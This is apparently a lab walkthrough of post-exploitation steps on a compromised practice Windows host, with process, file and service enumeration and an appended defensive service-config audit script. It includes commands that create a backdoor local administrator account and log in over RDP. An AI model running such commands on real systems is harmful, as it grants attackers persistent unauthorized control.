Beyond
This is the Beyond page, where additional post-exploitation enumeration and assessment are carried out as SYSTEM after the target system has been compromised.
C:\Windows\system32> net user adm1n Qwer1234 /ADD
net user adm1n Qwer1234 /ADD
The command completed successfully.
C:\Windows\system32> net localgroup administrators /ADD adm1n
net localgroup administrators /ADD adm1n
The command completed successfully.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/kevin/MS17-010]
└─$ xfreerdp /u:adm1n /p:'Qwer1234' /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0
Processes
C:\Windows\system32> tasklist /svc
tasklist /svc
Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
smss.exe 260 N/A
csrss.exe 340 N/A
wininit.exe 384 N/A
csrss.exe 392 N/A
winlogon.exe 448 N/A
services.exe 484 N/A
lsass.exe 492 EFS, KeyIso, ProtectedStorage, SamSs
lsm.exe 500 N/A
svchost.exe 604 DcomLaunch, PlugPlay, Power
vmacthlp.exe 664 VMware Physical Disk Helper Service
svchost.exe 696 RpcEptMapper, RpcSs
svchost.exe 748 Audiosrv, Dhcp, eventlog, lmhosts, wscsvc
svchost.exe 832 AudioEndpointBuilder, CscService, Netman,
SysMain, TrkWks, UmRdpService, UxSms,
WdiSystemHost
svchost.exe 916 AeLookupSvc, Browser, CertPropSvc, gpsvc,
IKEEXT, iphlpsvc, LanmanServer, ProfSvc,
Schedule, SENS, SessionEnv,
ShellHWDetection, Themes, Winmgmt
svchost.exe 1012 EventSystem, netprofm, nsi, WdiServiceHost
svchost.exe 1116 CryptSvc, Dnscache, LanmanWorkstation,
NlaSvc, TermService
spoolsv.exe 1212 Spooler
svchost.exe 1248 BFE, DPS, MpsSvc
VGAuthService.exe 1456 VGAuthService
vmtoolsd.exe 1484 VMTools
svchost.exe 1780 PolicyAgent
WmiPrvSE.exe 1872 N/A
taskhost.exe 324 N/A
dwm.exe 1480 N/A
explorer.exe 636 N/A
vmtoolsd.exe 2060 N/A
BETaskMgr.exe 2068 N/A
python.exe 2076 N/A
conhost.exe 2096 N/A
WmiPrvSE.exe 2168 N/A
msdtc.exe 2296 MSDTC
svchost.exe 3104 WinDefend
cmd.exe 820 N/A
conhost.exe 816 N/A
TrustedInstaller.exe 2480 TrustedInstaller
csrss.exe 2180 N/A
winlogon.exe 4076 N/A
LogonUI.exe 908 N/A
csrss.exe 868 N/A
winlogon.exe 3616 N/A
rdpclip.exe 1892 N/A
dwm.exe 3424 N/A
explorer.exe 2780 N/A
taskhost.exe 560 N/A
vmtoolsd.exe 2144 N/A
BETaskMgr.exe 2548 N/A
powershell.exe 2688 N/A
conhost.exe 3328 N/A
taskmgr.exe 1528 N/A
tasklist.exe 140 N/A
Notable process: python.exe (PID 2076).
kevin user
C:\Windows\system32> tree /F /A C:\Users\kevin
tree /F /A C:\Users\kevin
Folder PATH listing
Volume serial number is 00000002 A451:A4B1
C:\USERS\KEVIN
| hp.zip
| odbg110.zip
|
+---Contacts
| kevin.contact
|
+---Desktop
| hpservice.py
|
+---Documents
+---Downloads
+---Favorites
| +---Links
| | Suggested Sites.url
| | Web Slice Gallery.url
| |
| +---Links for United States
| | GobiernoUSA.gov.url
| | USA.gov.url
| |
| +---Microsoft Websites
| | IE Add-on site.url
| | IE site on Microsoft.com.url
| | Microsoft At Home.url
| | Microsoft At Work.url
| | Microsoft Store.url
| |
| +---MSN Websites
| | MSN Autos.url
| | MSN Entertainment.url
| | MSN Money.url
| | MSN Sports.url
| | MSN.url
| | MSNBC News.url
| |
| \---Windows Live
| Get Windows Live.url
| Windows Live Gallery.url
| Windows Live Mail.url
| Windows Live Spaces.url
|
+---Links
| Desktop.lnk
| Downloads.lnk
| RecentPlaces.lnk
|
+---Music
+---ollydbg
| BOOKMARK.DLL
| Cmdline.dll
| dbghelp.dll
| DevManBE.bak
| DevManBE.udd
| license.txt
| MSVCP60.bak
| MSVCP60.udd
| OLLYDBG.EXE
| OLLYDBG.HLP
| ollydbg.ini
| readme.txt
| register.txt
|
+---Pictures
+---Saved Games
+---Searches
\---Videos
hpservice.py
C:\Windows\system32> type C:\Users\kevin\Desktop\hpservice.py
type C:\Users\kevin\Desktop\hpservice.py
# Python 2 watchdog script found on the kevin user's Desktop.
import wmi, pythoncom, time, os

def startHP():
    # Start the devmanbe service when DevManBE.exe is not found running.
    cmd = 'sc start devmanbe'
    os.system(cmd)
    return

while True:
    hpok = False
    pythoncom.CoInitialize()
    try:
        c = wmi.WMI()
        # Enumerate running processes over WMI and look for the HP service binary.
        for process in c.Win32_Process():
            if process.Name == 'DevManBE.exe':
                hpok = True
                print "[*] Hp service ok, proc:", process.ProcessId
    finally:
        pythoncom.CoUninitialize()
    if not hpok:
        startHP()
    time.sleep(60)  # poll once a minute
The script checks for DevManBE.exe every 60 seconds and starts the devmanbe service whenever it is not running.
devmanbe service
C:\Windows\system32> sc qc devmanbe
sc qc devmanbe
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: devmanbe
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\HP\Power Manager\DevManBE.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HP Power Manager 4.2
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
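As an added defender-side example (not part of the write-up), the following Python parses the `sc qc` output shown above, decodes the TYPE bitmask using the Win32 service-type bits, and reports the configuration traits a hardening review would note: an interactive service, auto-start under LocalSystem, and an unquoted binary path containing spaces. The sample text is the page's own `sc qc devmanbe` output embedded as a constructed string; the function and flag names are my own.

```python
import re

# Constructed sample: the `sc qc devmanbe` output captured on this page.
SC_QC_SAMPLE = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: devmanbe
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files\HP\Power Manager\DevManBE.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : HP Power Manager 4.2
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# Service type bits as defined for the Win32 service API (TYPE is printed in hex).
SERVICE_TYPE_FLAGS = {
    0x001: "KERNEL_DRIVER",
    0x002: "FILE_SYSTEM_DRIVER",
    0x010: "WIN32_OWN_PROCESS",
    0x020: "WIN32_SHARE_PROCESS",
    0x100: "INTERACTIVE_PROCESS",
}

def parse_sc_qc(text):
    """Turn `sc qc` output into a dict of FIELD -> raw value string."""
    cfg = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            cfg[m.group(1)] = m.group(2).strip()
    return cfg

def decode_type(value):
    """Decode the hex TYPE field (e.g. '110  WIN32_OWN_PROCESS (interactive)') into flag names."""
    code = int(value.split()[0], 16)
    return [name for bit, name in sorted(SERVICE_TYPE_FLAGS.items()) if code & bit]

def audit_service(cfg):
    """Return hardening findings for one parsed service configuration."""
    findings = []
    flags = decode_type(cfg.get("TYPE", "0"))
    start = cfg.get("START_TYPE", "").split()
    account = cfg.get("SERVICE_START_NAME", "").lower()
    path = cfg.get("BINARY_PATH_NAME", "")
    if "INTERACTIVE_PROCESS" in flags:
        findings.append("interactive service (SERVICE_INTERACTIVE_PROCESS set)")
    if account in ("localsystem", r"nt authority\system") and start and start[0] == "2":
        findings.append("auto-start service running as LocalSystem")
    if " " in path and not path.startswith('"'):
        findings.append("unquoted binary path containing spaces")
    return findings
```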